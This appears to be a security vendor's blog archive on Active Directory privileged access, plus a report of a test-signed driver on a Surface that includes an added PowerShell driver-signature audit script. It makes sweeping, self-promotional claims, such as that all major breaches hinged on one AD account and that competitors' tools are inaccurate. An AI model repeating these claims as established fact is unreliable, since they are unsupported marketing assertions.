Question: What lies at the very foundation of cyber security and privileged access of not just the RSAs, EMCs, Dells, CyberArks, Gartners, Googles, Amazons, Facebooks and Microsofts of the world, but also at the foundation of virtually all cyber security and cloud companies and at the foundation of over 85% of organizations worldwide?
For those who may not know the answer to this ONE simple cyber security question, the answer's in line 1 here.
For those who may know the answer, and I sincerely hope that most of the world's CIOs, CISOs, Domain Admins, Cyber Security Analysts, Penetration Testers and Ethical Hackers know the answer, here are 4 simple follow-up questions -
Q 1. Should your organization's foundational Active Directory be compromised, what could be its impact?
Q 2. Would you agree that the (unintentional, intentional or coerced) compromise of a single Active Directory privileged user could result in the compromise of your organization's entire foundational Active Directory?
Q 3. If so, then do you know that there is only one correct way to accurately identify/audit privileged users in your organization's foundational Active Directory, and do you possess the capability to correctly be able to do so?
Q 4. If you don't, then how could you possibly know exactly how many privileged users there are in your organization's foundational Active Directory deployment today, and if you don't know so, ...OMG... ?!
You see, if even the world's top cyber security and cloud computing companies themselves don't know the answers to such simple, fundamental Kindergarten-level cyber security questions, how can we expect 85% of the world's organizations to know the answer, AND MORE IMPORTANTLY, what's the point of all this fancy peripheral cyber security talk at such conferences when organizations don't even know how many (hundreds if not thousands of) people have the Keys to their Kingdom(s)?!
Today Active Directory is at the very heart of Cyber Security and Privileged Access at over 85% of organizations worldwide, and if you can find me even ONE company at the prestigious RSA Conference 2019 that can help organizations accurately identify privileged users/access in 1000s of foundational Active Directory deployments worldwide, you'll have impressed me.
Those who truly understand Windows Security know that organizations can neither adequately secure their foundational Active Directory deployments nor accomplish any of these recent buzzword initiatives like Privileged Access Management, Privileged Account Discovery, Zero-Trust etc. without first being able to accurately identify privileged users in Active Directory.
Today's post is for all executives worldwide who comprise the C-Suite at thousands of organizations worldwide.
I pen today's post with profound respect for all executives worldwide, because I understand first-hand just how important the nature of their responsibilities is, how valuable their time is, and how far-reaching the consequences of their decisions are.
A quick footnote for all C*Os: In case you're wondering who I am to be penning this, I'm a former Microsoft Program Manager for Active Directory Security. Relevance? Microsoft's Active Directory is the foundation of your entire organization's cyber security. Finally, like you, I also happen to be the CEO of a $ Billion+ company.
Today's post is in the form of a simple letter, which follows below.
Subject - Cyber Security 101 for the C-Suite
To: Chairmen, CEOs and CFOs Worldwide
Hi, I'm Sanjay, former Microsoft Program Manager for Active Directory Security, but more importantly a sincere well-wisher who cares deeply about cyber security, and who just happens to know a thing or two about the very technology that lies at the very foundation of cyber security of your ($ Billion to $ Trillion) organization, and those of 85% of all organizations worldwide.
I write to you to bring to your attention a matter of paramount importance to your organization's foundational security.
Context - Foundational Security
Today we all engage in business in what is essentially a global digital village, wherein just about every aspect of business, whether it be production, marketing, sales, customer service, collaboration, finance etc., substantially relies on technology.
Within our respective organizations, it is our IT infrastructure that enables and empowers our workforce to engage in business.
For instance, we all (including us C*Os) log on to a computer every day, send and receive email, and create, share and access digital assets (e.g. documents, applications, services etc.) all of which are securely stored on our organizational computers.
It is only logical then that ensuring the security of the very IT infrastructure that enables and empowers our entire workforce to engage in business digitally, and the security of our digital assets is vital. In other words, cyber security is very important.
Now, if I told you that at the very foundation of your entire IT infrastructure, and consequently at the very foundation of the security of all your digital assets lay a single high-value asset, then I think you'd agree that its security would be paramount.
At the very foundation of your organization's IT infrastructure and that of its cyber security, and by corollary the cyber security of the entirety of all your digital assets (e.g. thousands of computers, thousands of employee user accounts and passwords, every single organizational email sent and received every minute of every day, all your applications, services, Intranet portals, Internet facing applications etc.) as well as the entirety of your organization's data, lies a single technology - Microsoft Active Directory.
Most simply put, Active Directory is the database that contains, stores and protects the entirety of your organization's building blocks of cyber security - each one of thousands of user accounts and their passwords, each one of thousands of computer accounts (for all laptops, desktops, servers etc.), each one of thousands of security groups that protect all your data etc. etc.
If your organization's Active Directory were compromised, everything would immediately be exposed to the risk of compromise.
Thus, as you'll hopefully agree, ensuring the security of your organization's foundational Active Directory is, well, paramount.
A Provable Concern - Inadequate Protection
Now, you might most likely be thinking - Well, if that's the case, I'm sure that our CIO, our CISO and their world-class IT and Cyber Security teams know all this, and have it adequately taken care of, so why should I be concerned?
Here's why you should be concerned - In all likelihood, not only may your world-class IT and Cyber Security teams not have this adequately covered, they may have yet to realize just how very important, and in fact paramount Active Directory security is.
Further, they likely may not know what it actually takes to adequately secure your organization's foundational Active Directory.
Now, as incredulous as that may sound, you have to trust me on this, not because I'm asking you to do so as a concerned well-wisher, but because I'm asking you to do so as arguably the world's #1 subject matter expert on Active Directory Security.
You see, prior to doing what I currently do, I was Microsoft's subject matter expert for Active Directory Security on Microsoft's Windows Server Development team. In case you're curious as to what I currently do with all this knowledge, well, it's this.
As the world's leading subject matter expert on Active Directory Security, I would highly encourage you to ask your IT and Cyber Security leadership, specifically your CIO and your CISO, just how secure they think your organization's Active Directory is.
Simple Proof - You Just Have to Ask
When you ask them about it, please do request specific answers, and here are 7 simple questions you can ask them, the answers to which will give you an indication of just how secure your organization's Active Directory actually is today -
Is the security of our foundational Active Directory deployment a top cyber security priority today?
I could suggest 50 such elemental cyber security questions, but for now these 7 simple, precise questions will suffice as there are only 2 possibilities here - either your IT and cyber security leadership have exact answers to these questions, or they don't.
If they can't give you exact answers to these questions, your organization's Active Directory is not secure - it's as simple as that.
They might tell you that this is complicated or that they have a good approximation, or that this is very difficult to do, or that they have many other latest buzzword measures like Active Directory Auditing, Privileged Access Management, ATA, Just-in-Time Administration etc. in place, but none of that matters, because the truth is simple - they either have exact answers, or they don't.
(These questions are paramount to cyber security, and today there exists technology that can enable every organization in the world to answer them precisely, but because Microsoft likely forgot to adequately educate its customers, your IT personnel may likely not even know the importance of these paramount questions, let alone knowing what it takes to correctly answer them.)
If a $Billion+ organization doesn't even know exactly who has what privileged access in their Active Directory, as well as exactly who can manage each one of their privileged accounts and groups, how could their Active Directory possibly be secure?
If an organization's foundational Active Directory is not secure, how can the entirety of the organization's digital (IT) assets be secure, and if that's not the case, how could an organization possibly be considered secure from a cyber security perspective?
As a member of the C-Suite, you not only have the privilege of being able to impact vital change in your organization, you also have the responsibility and the authority to demand and ensure the cyber security of the very foundation of your organization.
As a C*O, one of the most important responsibilities you shoulder is ensuring that your organization is secure, and ensuring that the very foundation of your organization's IT infrastructure and cyber security is always adequately protected is paramount.
The Likely Reason (Optional Reading)
Here's the likely reason for why such a common-sense yet paramount matter may not be on your CIO's and CISO's radar yet.
You see, your CIO and CISO shoulder great responsibility. Unfortunately, amongst many other things, they're likely also being guided by inputs from a 1000 cyber security companies, who unfortunately may not be the best source of objective guidance.
For instance, consider CyberArk, a highly respected $ Billion+ cyber security company, that claims that over 50% of the Fortune 100's CISOs rely on them. As a subject matter expert, I can tell you that CyberArk itself may not know how to correctly assess privileged access in an Active Directory, so you see, unfortunately your CIO and CISO may not be getting the best guidance.
CyberArk is absolutely correct that "Privilege is Everywhere." However, those who know Windows Security will tell you that in a Windows network powered by Active Directory, the majority of all privileged access (delegated & unrestricted) lies inside Active Directory, but CyberArk doesn't seem to have the capability to correctly audit privileged access inside Active Directory.
The majority of all Privileged Access, including the "Keys to the Kingdom", resides inside Active Directory
CyberArk isn't alone. As unbelievable as it may sound, today even Microsoft doesn't seem to know what it takes to do so, let alone possessing the capability to help its customers correctly do so. In fact, most of the world's top IT Consulting, Audit, Cloud and Cyber Security companies also operate on Active Directory, and they too likely have neither a clue nor the capability to accurately determine exactly who has what privileged access in their own foundational Active Directory deployments.
You may find this hard to believe, but of the 1000+ cyber security companies exhibiting or presenting at the upcoming RSA Conference 2019, not a single one of them can help your organization's IT personnel fulfill such a fundamental yet paramount cyber security need - finding out exactly who has what privileged access in your organization's foundational Active Directory.
In their defense, I'll say this - if it were easy, they would've all done it by now. Unfortunately, as paramount as it is, it's not easy. Thus, I know what your CIO and CISO may perhaps not yet know, or understand the paramount importance of, which is that of all the things that need to be secured, none could possibly be more important than securing your organization's foundational Active Directory, so I thought I'd share this with you, because as a member of the C-Suite, you could provide them the strategic guidance and the executive support that their teams need to accomplish this paramount objective for your organization.
I only wrote this letter because we're all in this together, and I care deeply about foundational cyber security, as hopefully do you, and I felt that I could perhaps help bridge the gap between those tasked with the great responsibility of securing Active Directory (i.e. your IT personnel) and those whose executive support they need to be able to do so (i.e. you, the C-Suite.)
If any of what I shared above made sense, I would encourage you to embrace my suggestions earnestly and act upon them, and if needed, I can prove and demonstrate everything I've shared above, and you should feel free to take me up on this.
As for myself, all I can say is that today my work and knowledge silently help secure and defend so many of the world's most important organizations across six continents worldwide.
In days to come, I'm going to answer both the most important, and the second most important, question in all of Cyber Security.
Today though, I just wanted to ask a simple (rhetorical) cyber security question, so that CEOs, CIOs, CISOs and IT Directors at organizations worldwide realize just what lies at the very foundation of the cyber security of their multi-billion $ organizations.
Consequently, it logically follows that all organizations that operate on Microsoft Active Directory are only as secure as are their foundational Active Directory deployments. After all, no matter how tall, every skyscraper is only as strong as its foundation.
In days to come, I'll share with you just how secure foundational Active Directory deployments are worldwide today - right here.
Today, to give a hint for the answer to this one question, I asked possibly the most important cyber security question in the world, one that directly impacts the foundational security of 1000s of organizations worldwide, and thus one that impacts the financial security of billions of people worldwide -
What's the World's Most Important Active Directory Security Capability?
Given what it is I do, I don't squander a minute of precious time, unless something is very important, and this is very important.
Let me explain why this is so alarming, concerning and so important to cyber security, and why at many organizations (e.g. U.S. Govt., Paramount Defenses etc.), this could've either possibly resulted in, or in itself, be considered a cyber security breach.
Disclaimer: I'm not making any value judgment about Lenovo; I'm merely basing this on what's already been said.
As you know, Microsoft's been brazenly leaving billions of people and thousands of organizations worldwide with no real choice but to upgrade to their latest operating system, Windows 10, which albeit is far from perfect, is much better than Windows Vista, Windows 8 etc., even though Windows 10's default settings could be considered an egregious affront to Privacy.
Consequently, at Paramount Defenses, we too felt that perhaps it was time to consider moving on to Windows 10, so we too figured we'd refresh our workforce's PCs. Now, of the major choices available from amongst several reputable PC vendors out there, Microsoft's Surface was one of the top trustworthy contenders, considering that the entirety of the hardware and software was from the same vendor (and one that was decently trustworthy, considering that most of the world is running their operating system), and that there seemed to be no* pre-installed drivers or software that may have been written in China, Russia etc.
Side-note: Based on information available in the public domain, in all likelihood, software written in / maintained from within Russia, may still likely be running as System on Domain Controllers within the U.S. Government.
So we decided to consider evaluating Microsoft Surface devices and thus purchased a couple of brand-new Microsoft Surface devices from our local Microsoft Store for an initial PoC, and I decided to personally test-drive one of them -
The very first thing we did after unsealing them, walking through the initial setup and locking down Windows 10's unacceptable default privacy settings, was to connect one to the Internet over a secure channel and perform a Windows Update.
I should mention that there was no other device attached to this Microsoft Surface, except for a Microsoft Signature Type Cover, and in particular there were no mice of any kind attached to this new Microsoft Surface device, whether via USB or Bluetooth.
Now, you're not going to believe what happened within minutes of having clicked the Check for Updates button!
Windows Update Downloaded and Installed an Untrusted Self-Signed Lenovo Device Driver on Microsoft Surface! -
Within minutes, Windows Update had automatically downloaded and installed, amongst other packages (notably Surface Firmware), an untrusted self-signed Kernel-mode device driver, purportedly Lenovo - Keyboard, Other hardware - Lenovo Optical Mouse (HID), on this brand-new Microsoft Surface device, i.e. one signed with an untrusted WDK Test Certificate!
Here's a snapshot of Windows Update indicating that it had successfully downloaded and installed a Lenovo driver on this Surface device, and it specifically states "Lenovo - Keyboard, Other hardware - Lenovo Optical Mouse (HID)" -
We couldn't quite believe this. How could this be possible? I.e., how could a Lenovo driver have been installed on a Microsoft Surface device?
So we checked the Windows Update Log, and sure enough, as seen in the snapshot below, the Windows Update Log too confirmed that Windows Update had just downloaded and installed a Lenovo driver -
We wondered if there might have been any Lenovo hardware components installed on the Surface, so we checked the Device Manager, and we could not find a single device that seemed to indicate the presence of any Lenovo hardware. (Later, we even took it back to the Microsoft Store, and their skilled tech personnel confirmed the same finding, i.e. no Lenovo hardware on it.)
Specifically, as you can see below, we again checked the Device Manager, this time to see if it might indicate the presence of any Lenovo HID, such as a Lenovo Optical Mouse, and as you can see in the snapshot below, the only two Mice and other pointing devices installed on the system were from Microsoft - i.e. no Lenovo mouse presence indicated by Device Manager -
Next, we performed a keyword search of the Registry, and came across a suspicious Driver Package, as seen below -
It seemed suspicious to us because, as can be seen in the snapshot above, all of the other legitimate driver package keys in the Registry had (as they should) three child sub-keys, i.e. Configurations, Descriptors and Strings, but this specific one only had one subkey titled Properties, and when we tried to open it, we received an Access Denied message!
As you can see above, it seemed to indicate that the provider was Lenovo, that the INF file name was phidmou.inf, and that the OEM path was "C:\Windows\SoftwareDistribution\Download\Install", so we looked at the file system, but this path didn't seem to exist on the file system. So we performed a simple file-system search "dir /s phidmou.*" and, as seen in the snapshot below, we found one instance of such a file, located in C:\Windows\System32\DriverStore\FileRepository\.
Here's that exact location on the file system, and as evidenced by the Created date and time for that folder, one can see that this folder (and thus all of its contents) was created on April 01, 2018 at around 1:50 am, which is just around the time the Windows Update log too confirmed that it had installed the Lenovo driver -
When we opened that location, we found thirteen items, including six drivers -
Next, we checked the Digital Signature on one of the drivers, PELMOUSE.SYS, and we found that it was signed using a self-signed test Windows Driver certificate, i.e. the .sys files were SELF-SIGNED by a WDKTestCert and their digital signatures were NOT OK, in that they terminated in a root certificate that is not trusted by the trust provider -
Finally, when we clicked on the View Certificate button, as can be seen below, we could see that this driver was in fact merely signed by a test certificate, which is only supposed to be used for testing purposes during the creation and development of Kernel-mode drivers. Quoting from Microsoft's documentation on Driver Testing "However, eventually it will become necessary to test-sign your driver during its development, and ultimately release-sign your driver before publishing it to users." -
Clearly, the certificate seen above is NOT one that is intended to be used for release signing, yet here we have a Kernel-mode driver downloaded by Windows Update and installed on a brand-new Microsoft Surface, and all it's signed by is a test certificate, and who knows who wrote this driver!
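The verification walked through above (locate the driver package in the Driver Store, check each .sys file's Authenticode chain, flag anything that ends in an untrusted root or a WDK test certificate) can be run across the whole Driver Store in one pass. The following PowerShell is an added example, not code from the original post or from Microsoft; it assumes the standard Windows 10 Driver Store path, uses the built-in Get-AuthenticodeSignature and Get-WindowsDriver cmdlets, and treats the "WDKTestCert" subject pattern from the post as the test-signing indicator.

```powershell
# Added example (not part of the original post): audit the Driver Store for
# kernel-mode drivers whose signature chain is not trusted or whose signer is a
# WDK test certificate. Run from an elevated PowerShell prompt on Windows 10.

# Assumption: default Driver Store location on a Windows 10 system.
$DriverStore = Join-Path $env:SystemRoot 'System32\DriverStore\FileRepository'

function Get-SuspiciousDriverSignatures {
    param([string]$Path = $DriverStore)

    Get-ChildItem -Path $Path -Recurse -Filter '*.sys' -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Checks the embedded (or catalog) Authenticode signature and its chain.
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<no signer>' }
            [pscustomobject]@{
                Driver        = $_.FullName
                PackageFolder = $_.Directory.Name      # e.g. phidmou.inf_amd64_<hash>
                Created       = $_.Directory.CreationTime
                Status        = $sig.Status            # Valid, NotSigned, UnknownError (untrusted root), ...
                StatusMessage = $sig.StatusMessage     # "terminated in a root certificate which is not trusted"
                Signer        = $signer
            }
        } |
        Where-Object {
            # Anything other than a fully trusted chain is worth a look, and a
            # WDKTestCert signer is never acceptable on a production system.
            $_.Status -ne 'Valid' -or $_.Signer -match 'WDKTestCert'
        }
}

function Get-ThirdPartyDriverPackages {
    # Correlate findings with the staged third-party (oemNN.inf) packages and
    # their declared provider, so a package can be tied back to its INF.
    Get-WindowsDriver -Online |
        Select-Object Driver, OriginalFileName, ProviderName, ClassName, Date, Version
}

function Test-TestSigningEnabled {
    # A test-signed driver can only load if the boot configuration allows it;
    # report whether TESTSIGNING is switched on for the current boot entry.
    $bcd = & bcdedit.exe /enum '{current}' 2>$null
    return [bool]($bcd -match '^\s*testsigning\s+Yes')
}

# Usage: list suspicious drivers, then show the third-party packages for context.
Get-SuspiciousDriverSignatures | Format-Table PackageFolder, Status, Signer, Created -AutoSize
Get-ThirdPartyDriverPackages   | Format-Table Driver, OriginalFileName, ProviderName, Date -AutoSize
"Test-signing enabled: $(Test-TestSigningEnabled)"
```

A package whose .sys files report an untrusted root while Test-TestSigningEnabled returns False is the combination the post describes: staged by Windows Update even though the machine itself is not configured to accept test-signed code.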
Again, per Microsoft's guidelines on driver signing, which can also be found here, "After completing test signing and verifying that the driver is ready for release, the driver package has to be release signed", and AFAIK, release signing not only requires the signer to obtain and use a code-signing certificate from a code-signing CA, it also requires a cross cert issued by Microsoft.
If that is indeed the case, then a Kernel-mode driver that is not signed with a valid code-signing certificate, and one whose digital signature does not contain Microsoft's cross cert, should not even be accepted into the Windows Update catalog.
It is thus hard to believe that a Windows Kernel-mode driver that is merely self-signed using a test certificate would even make it into the Windows Update catalog, and further it seems that in this case, not only did it make it in, it was downloaded and in fact successfully installed onto a system, which clearly seems highly suspicious, and is in fact alarming and deeply concerning!
How could this be? How could Windows Update (a trusted system process of the operating system), which we all (have no choice but to) trust (and have to do so blindly and completely) have itself installed an untrusted self-signed Lenovo driver (i.e. code running in Kernel-Mode) on a Microsoft Surface device?
Frankly, since this piece of software was signed using a self-signed test cert, who's to say this was even a real Lenovo driver? It could very well be some malicious code purporting to be a Lenovo driver. Or, there is also the remote possibility that it could be a legitimate Lenovo driver, that is self-signed, but if that is the case, its installation should not have been allowed to succeed.
To us, this is unacceptable, alarming and deeply concerning, and here's why.
We just had, on a device we consider trustworthy (and could possibly have engaged in business on), procured from a vendor we consider trustworthy (considering that the entire world's cyber security ultimately depends on them), an unknown, unsigned piece of software of Chinese origin that is now running in Kernel-mode, installed on the device by this device's vendor's (i.e. Microsoft's) own product's (the Windows operating system's) update program!
We have not had an opportunity to analyze this code, but if it is indeed malicious in any way, in effect, it would've, unbeknownst to us and for no fault of ours, granted System-level control over a trusted device within our perimeter, to some entity in China.
How much damage could that have caused? Well, suffice it to say that, for they who know Windows Security well, if this was indeed malicious, it would've been sufficient to potentially compromise any organization within which this potentially suspect and malicious package may have been auto-installed by Windows update. (I've elaborated a bit on this below.)
In the simplest scenario, if a company's Domain Admins had been using this device, it would've been Game Over right there!
This leads me to the next question - we can't help but wonder how many such identical Surface devices exist out there today, perhaps at 1000s of organizations, on which this suspicious unsigned Lenovo driver may have been downloaded and installed?
This also leads me to another very important question - Just how much trust can we, the world, impose in Windows Update?
In our case, it just so happened that we were in front of this device during this Windows Update process, and that's how we noticed this, and by the way, after it was done, it gave the familiar Your device is up to date message.
Speaking of which, here's another equally important question - For all organizations that are using Microsoft Surface, and may be using it for mission-critical or sensitive purposes (e.g. AD administration), what is the guarantee that this won't happen again?
I ask because if you understand cyber security, then you know, that it ONLY takes ONE instance of ONE malicious piece of software to be installed on a system, to compromise the security of that system, and if that system was a highly-trusted internal system (e.g. that machine's domain computer account had the "Trusted for Unconstrained Delegation" bit set), then this could very likely also aid perpetrators in ultimately gaining complete command and control of the entire IT infrastructure. As I have already alluded to above, if by chance the target/compromised computer was one that was being used by an Active Directory Privileged User, then, it would be tantamount to Game Over right then and there!
Think about it - this could have happened at any organization, from say the U.S. Government to the British Government, or from say a Goldman Sachs to a Palantir, or say from a stock-exchange to an airline, or say at a clandestine national security agency to say at a nuclear reactor, or even Microsoft itself. In short, for absolutely no fault of theirs, an organization could potentially have been breached by a likely malicious piece of software that the operating system's own update utility had downloaded and installed on the System, and in 99% of situations, because hardly anyone checks what gets installed by Windows Update (now that we have to download and install a whopping 600MB patch every Tuesday), this would likely have gone unnoticed!
Again, to be perfectly clear, I'm not saying that a provably malicious piece of software was in fact downloaded and installed on a Microsoft Surface device by Windows Update. What I'm saying is that a highly suspicious piece of software, one that was built and intended to run in Kernel-mode and yet was merely signed with a test certificate, somehow was automatically downloaded and installed on a Microsoft Surface device, and that to us is deeply concerning, because in essence, if this could happen, then even at organizations that may be spending millions on cyber security, a single such piece of software quietly making its way in through such a trusted channel, could possibly instantly render their entire multi-million dollar cyber security apparatus useless, and jeopardize the security of the entire organization, and this could happen at thousands of organizations worldwide.
With full respect to Microsoft and Mr. Nadella, this is deeply concerning and unacceptable, and I'd like some assurance, as I'm sure would 1000s of other CEOs and CISOs, that this will never happen again, on any Surface device, in any organization.
In our case, this was very important, because had we put that brand-new Surface device that we procured from none other than the Microsoft Store into operation (even if we had re-imaged it with an ultra-secure locked-down internal image), from minute one, post the initial Windows Update, we would likely have had a potentially compromised device running within our internal network, and it could perhaps have led to us being breached.
If I Were Microsoft, I'd Send a Plane
Dear Microsoft, we immediately quarantined that Microsoft Surface device, and we have it in our possession.
If I were you, I'd send a plane to get it picked up ASAP, so you can thoroughly investigate every little aspect of this to figure out how this possibly happened, and get to the bottom of it! (Petty process note: The Microsoft Store let us keep the device for a bit longer, but will not let us return the device past June 24, and the only reason we've kept it is in case you'd want to analyze it.) Here's why. At the very least, if I were still at Microsoft, and in charge of Cyber Security -
I'd want to know how an untrusted Kernel-mode device driver made it into the Windows Catalog
I'd want to know why a Microsoft Surface device downloaded a purportedly Lenovo driver
I'd want to know how Windows 10 permitted and in fact itself installed an untrusted driver
I'd want to know exactly which SKUs of Microsoft Surface this may have happened on
I'd want to know exactly how many such Microsoft Surface devices out there may have downloaded this package
Further, and as such, considering that Microsoft Corp itself may easily have thousands of Surface devices being used within Microsoft itself, if I were still with Microsoft CorpSec, I'd certainly want to know how many of their own Surface devices may have automatically downloaded and installed this highly suspicious piece of untrusted self-signed software.
In short, Microsoft, if you care as deeply about cyber security as you say you do, and by that I'm referring to what Mr. Nadella, the CEO of Microsoft, recently said (see video below: 0:40 - 0:44), and I quote, "we spend over a billion dollars of R&D each year, in building security into our mainstream products", then you'll want to get to the bottom of this, because other than the Cloud, what could be a more mainstream product for Microsoft today than Microsoft Windows and Microsoft Surface?
Folks, the only reason I decided to publicly share this is because I care deeply about cyber security, and I believe that this could potentially have impacted the foundational cyber security of any, and potentially, of thousands of organizations worldwide.
Hopefully, as you'll agree, a trusted component (i.e. Windows Update) of an operating system that virtually the whole world will soon be running on (i.e. Windows 10), should not be downloading and installing a piece of software that runs in Kernel-mode, when that piece of software isn't even digitally signed by a valid digital certificate, because if that piece of software happened to be malicious, then in doing so, it could likely, automatically, and for no fault of its users, instantly compromise the cyber security of possibly thousands of organizations worldwide. This is really as simple, as fundamental and as concerning, as that.
All in all, the Microsoft Surface is an incredible device, and because, like Apple's computers, the entire hardware and software is in control of a single vendor, Microsoft has a huge opportunity to deliver a trustworthy computing device to the world, and we'd love to embrace it. Thus, it is vital for Microsoft to ensure that its other components (e.g. Update) do not let the security of its mainstream products down, because per the Principle of Weakest Link, "a system is only as secure as is its weakest link."
For those who may not know what Active Directory Security is (i.e. most CEOs, a few CISOs, and most employees and citizens), suffice it to say that global security may depend on Active Directory Security, and thus may be a matter of paramount defenses.
Most respectfully, Sanjay
PS: Full Disclosure: I had also immediately brought this matter to the attention of the Microsoft Store. They escalated it to Tier-3 support (based out of New Delhi, India), who then asked me to use the Windows Feedback utility to share the relevant evidence with Microsoft, which I immediately and dutifully did, and I never heard back from anyone at Microsoft in this regard again.
PS2: Another small request to Microsoft - Dear Microsoft, while at it, could you please also educate your global customer base about the paramount importance of Active Directory Effective Permissions, which is the ONE capability without which not a single object in any Active Directory deployment can be adequately secured! Considering that Active Directory is the foundation of cyber security of over 85% of all organizations worldwide, this is important. Over the last few years, we've had almost 10,000 organizations from 150+ countries knock at our doors, and virtually none of them seem to know this most basic and cardinal fact of Windows Security. I couldn't begin to tell you how shocking it is for us to learn that most Domain Admins and many CISOs out there don't have a clue. Can you imagine just how insecure and vulnerable an organization whose Domain Admins don't even know what Active Directory Effective Permissions are, let alone possessing this paramount capability, could be today?
As we get ready to bid farewell to 2017, it may be fitting to recap notable happenings in Active Directory Security this year.
This appears to have been the year in which the mainstream Cyber Security community finally seems to have realized just how important and in fact paramount Active Directory Security is to cyber security worldwide, in that it appears that they may have finally realized that Active Directory is the very heart and foundation of privileged access at 85% of organizations worldwide!
I say so only because it appears to have been in this year that the following terms seem to have become mainstream cyber security buzzwords worldwide - Privileged User, Privileged Access, Domain Admins, Enterprise Admins, Mimikatz DCSync, AdminSDHolder, Active Directory ACLs, Active Directory Privilege Escalation, Sneaky Persistence in Active Directory, Stealthy Admins in Active Directory, Shadow Admins in Active Directory, Domain Controllers, Active Directory Botnets, etc. etc.
Active Directory Security Goes Mainstream Cyber Security
Here are the 10 notable events in Active Directory Security that helped it get mainstream cyber security attention this year -
1. Since the beginning of the year, i.e. January 01, 2017, Mimikatz DCSync, an incredibly and dangerously powerful tool built by Benjamin Delpy, which can be used to instantly compromise the credentials of all Active Directory domain user accounts in an organization, including those of all privileged user accounts, has been gaining immense popularity, and appears to have become a must-have tool in every hacker's, perpetrator's and penetration tester's arsenal.
2. On May 15, 2017, the developers of BloodHound introduced version 1.3, with the objective of enhancing its ability to find privilege escalation paths in Active Directory that could help answer "Who can become Domain Admin?" From that point on, BloodHound, which is massively inaccurate, seems to have started becoming very popular in the hacking community.
3. On June 08, 2017, CyberArk, a billion-dollar cyber security company and the self-proclaimed leader in Privileged Account Security, introduced the concept of Shadow Admins in Active Directory, and released a (massively inaccurate) tool called ACLight to help organizations identify all such Shadow Admins in Active Directory deployments worldwide.
4. On June 14, 2017, Sean Metcalf, an Active Directory security enthusiast, penned an entry-level post, "Scanning for Active Directory Privileges and Privileged Accounts", noting that Active Directory recon is the new hotness since attackers, Red Teamers and penetration testers have realized that control of Active Directory provides power over the organization.
5. On July 11, 2017, Preempt, a cyber security company, announced that they had found a vulnerability in Microsoft's implementation of LDAPS that permits an NTLM relay attack, and in effect could allow an individual to impersonate an (already) privileged user and perform certain LDAP operations to gain privileged access.
6. On July 26, 2017, the developers of (massively inaccurate) BloodHound gave a presentation titled "An ACE Up the Sleeve - Designing Active Directory DACL Backdoors" at the famed Black Hat USA 2017 conference. This presentation likely played a big role in bringing Active Directory Security to the forefront of mainstream cyber security.
7. Also on July 26, 2017, a second Black Hat presentation on Active Directory Security, titled "The Active Directory Botnet", introduced the world to a new attack technique that exploits the default access granted to all Active Directory users to set up command and control servers within organizations worldwide. This too made waves.
8. On September 18, 2017, Microsoft's Advanced Threat Analytics (ATA) team penned a detailed and insightful blog post titled "Active Directory Access Control List - Attacks and Defense", citing that recently there has been a lot of attention regarding the use of Active Directory ACLs for privilege escalation in Active Directory environments. Unfortunately, in doing so Microsoft inadvertently ended up revealing just how little its ATA team seems to know about the subject.
9. On December 12, 2017, Preempt, a cyber security company, announced that they had found a flaw in Microsoft's Azure Active Directory Connect software that could allow Stealthy Admins to gain full domain control. They also suggested that organizations worldwide use their (massively inaccurate) tooling to find these Stealthy Admins in Active Directory.
Helping Defend Microsoft's Global Customer Base ( i.e. 85% of Organizations Worldwide )
Folks, since January 01, 2017, both, as former Microsoft Program Manager for Active Directory Security and as the CEO of Paramount Defenses, I've penned 50+ insightful blog posts to help educate thousands of organizations worldwide about...
...not just the paramount importance of Active Directory Security to their foundational security, but also about how to correctly secure and defend their foundational Active Directory from every cyber security risk/challenge covered in points 1-9 above.
I trust you're well. Today, I just wanted to take a few minutes to answer a few questions that I've been asked so many times.
Here are the answers to the Top-5 questions I am frequently asked -
You're the CEO of a company (Paramount Defenses), so why do you blog so often, and how do you have time to do so?
Good question. This is a bit of a unique situation, in that whilst I am the CEO of a company, I am also a subject matter expert in Active Directory Security (simply by virtue of my background) and thus I feel that it is my civic duty to help organizations understand the paramount importance of securing their foundational Active Directory deployments.
In fact, over the last 7+ years, I've penned 150+ blog posts on Active Directory Security (here) and Cyber Security (here) on various topics such as Active Directory Privilege Escalation, the OPM Breach, Kerberos Token Bloat, Eff Perms, AdminSDHolder, Mimikatz DCSync, Sneaky Persistence, How to Correctly Identify Stealthy Admins in Active Directory, How to Correctly Identify Shadow Admins in Active Directory etc. and most recently on Active Directory Botnets.
As to how I have the time to do so, that's actually not that difficult. We have a world-class team at Paramount Defenses, and I've been able to delegate a substantial amount of my CEO-related work amongst our executive leadership team.
Speaking of which, how big is Paramount Defenses?
At Paramount Defenses, we believe that less is more, so our entire global team is fewer than 100 people. For security reasons, 100% of our staff are U.S. citizens, and to date, the entirety of our R&D team are former Microsoft employees.
If by how big we are, you meant how many organizations we impact, today our unique high-value cyber security solutions and insights help adequately secure and defend thousands of prominent organizations across six continents worldwide.
Why is it just you (and why aren't your employees) on Social Media (e.g. LinkedIn, Facebook, Twitter etc.)?
The simple answer to this question - For Security Reasons.
At Paramount Defenses, we care deeply about cyber security, so we also strive to lead by example in every way.
As it pertains to cyber security, we have found that the presence of an organization's employees on social-media almost always results in excessive information disclosure that could be very valuable for hackers and various other entities who may have malicious intent, so our corporate policies do not permit a social media presence.
Also, we're not huge fans of Twitter, and we certainly don't care about being on Facebook. We do like and appreciate LinkedIn, and in fact, we lead the world's largest community of Active Directory Security Professionals on LinkedIn.
You see, the Crown Jewels of cyber security reside in Active Directory, and if they're compromised, its Game Over. By Crown Jewels, I'm referring to privileged access, or as commonly known, Domain Admin equivalent accounts.
It is a fact that 100% of all major recent cyber security breaches (except Equifax) involved the compromise of a single Active Directory privileged user account. Such accounts are Target #1 for hackers, which is why it is so very important that organizations be able to exactly identify and minimize the number of such privileged accounts in Active Directory.
Now, when it comes to identifying privileged user accounts in Active Directory, most organizations focus on enumerating the memberships of their default administrative groups in Active Directory, and that's it. Unfortunately, that's just the tip of the iceberg, and we have found that most of them do not even seem to know that there are in fact far more accounts with varying levels of elevated admin/privileged access in Active Directory than they are aware of.
This isn't a secret; it's something you know if you've ever heard about Active Directory's most powerful and capable cyber security feature - Delegation of Administration. The truth is that at most organizations, a substantial amount of delegation has been done over the years, yet no one seems to have a clue as to who has what privileged access. Here's why.
